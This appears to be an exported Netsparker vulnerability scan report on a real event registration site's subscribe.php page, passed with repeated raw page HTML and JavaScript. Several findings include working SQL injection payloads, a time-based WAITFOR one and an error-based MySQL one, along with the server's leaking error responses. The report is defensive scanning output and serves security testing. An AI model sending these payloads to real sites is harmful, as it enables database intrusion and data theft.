Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"><li>Please, fill in the required fields.</li> i = 15 amount</td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type..
PHP Version Disclosure
PHP Version Disclosure
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
PHP/5.2.14
Request
POST /subscribe.php?event_id=82 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 673 Accept-Encoding: gzip, deflate accomodations=&address=&avail_balance=&balance_after_ct=&card_num=&cc_type=Mastercard&city=&company=&conference=&conferenceval=895.00%2c356&contact_fname=&contact_lname=&coupon=&coupon_amount=&department=&dietary=&discountamount=0&discountcode=&email=&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=&first_name=&last_name=&leed_source=&pakdis=&payment_method=cc&phone=&priceconfid=0&priceworkshopid=&reset=reset&response_code=&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=&Status=&submit=Submit&title=&total=&workshop=&workshop_alphabet=&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" >Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"><li>Please, fill in the required fields.</li> i = 15 amount</td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type..
Database Error Message
Database Error Message
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
Parameters
Parameter
Type
Value
event_id
GET
';WAITFOR DELAY '0:0:25'--
Request
GET /subscribe.php?event_id=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 315 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'-- AND type = 1 AND active = 1 ORDER BY `order` ASC, price_id A' at line 3
MySQL Database Identified
MySQL Database Identified
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
Request
GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 130 Connection: close Content-Type: text/html <script language="javascript"> window.location.href="events.php"; </script>Duplicate entry '_!@4dilemma:0' for key 1
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
info@gsmiweb.com
Request
POST /subscribe.php?event_id=82 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=82 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: events.gsmiweb.com Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7 Content-Length: 673 Accept-Encoding: gzip, deflate accomodations=&address=&avail_balance=&balance_after_ct=&card_num=&cc_type=Mastercard&city=&company=&conference=&conferenceval=895.00%2c356&contact_fname=&contact_lname=&coupon=&coupon_amount=&department=&dietary=&discountamount=0&discountcode=&email=&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=&first_name=&last_name=&leed_source=&pakdis=&payment_method=cc&phone=&priceconfid=0&priceworkshopid=&reset=reset&response_code=&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=&Status=&submit=Submit&title=&total=&workshop=&workshop_alphabet=&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=
Response
HTTP/1.1 200 OK Date: Thu, 28 Apr 2011 13:52:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a 